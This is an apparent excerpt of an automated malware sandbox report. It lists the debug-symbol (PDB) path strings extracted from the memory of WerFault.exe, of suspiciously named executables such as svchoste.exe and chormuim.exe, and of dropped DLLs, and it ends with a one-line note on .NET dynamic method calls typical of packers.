Source:	Binary string: winnsi.pdbL source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.4.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK source: chormuim.exe, 00000008.00000003.350829566.000000001B765000.00000004.00000001.sdmp
Source:	Binary string: vaultcli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: sspicli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source:	Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdbpdb0x source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: rasapi32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb/ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wmiutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemsvc.pdb8 source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: clr.pdbM source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: %mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398156992.0000026D703B7000.00000004.00000001.sdmp
Source:	Binary string: gdi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb} source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb^ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdbe source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: fastprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: winrnr.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: clr.pdb0 source: WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source:	Binary string: user32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: vcruntime140.i386.pdb source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: fastprox.pdbW source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: UxTheme.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: win32u.pdbf source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb* source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb"" source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: wbemcomn.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001D.00000003.387264777.0000026D70821000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb` source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377203232.0000026D6FE56000.00000004.00000001.sdmp
Source:	Binary string: orms.ni.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: gdi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbS source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: vcruntime140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.312315900.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.312994791.0000000003827000.00000004.00000001.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: kernel32.pdb source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: msvcp140.i386.pdb source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source:	Binary string: win32u.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: vaultcli.pdb] source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb0 source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source:	Binary string: imm32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rsaenh.pdb= source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb\| source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mswsock.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbl source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbj source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: tion.ni.pdb source: WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp
Source:	Binary string: UxTheme.pdbH source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ncrypt.pdbv source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mswsock.pdb& source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: imm32.pdbB source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: DotNetZip.dll.8.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: System.Management.pdbDD source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: System.Management.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: nsi.pdbK_ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp
Source:	Binary string: System.Management.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: kernel32.pdb0 source: WerFault.exe, 0000001D.00000003.377294930.0000026D6FDD6000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.378691254.0000026D6FDD6000.00000004.00000001.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemprox.pdbT source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rpcrt4.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: pnrpnsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: _.pdb source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source:	Binary string: version.pdbx source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source:	Binary string: ws2_32.pdb! source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source:	Binary string: oleaut32.pdbA source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000003.350741840.000000001B717000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc6.pdb; source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: nlaapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: lib.pdb.0 source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Drawing.pdb source: WER5768.tmp.dmp.29.dr
Source:	Binary string: gdi32full.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: gdiplus.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb0 source: WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp
Source:	Binary string: ntasn1.pdbn source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb, source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdbF source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: msvcr120_clr0400.amd64.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: rasman.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemcomn.pdbi source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386864637.0000026D7084C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387077452.0000026D7084E000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387228013.0000026D70850000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbP source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdb source: WerFault.exe, 0000001D.00000003.379211829.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.376916862.0000026D6E058000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.377268412.0000026D6E058000.00000004.00000001.sdmp
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbY source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: nlaapi.pdbJ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: wbemprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source:	Binary string: edputil.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

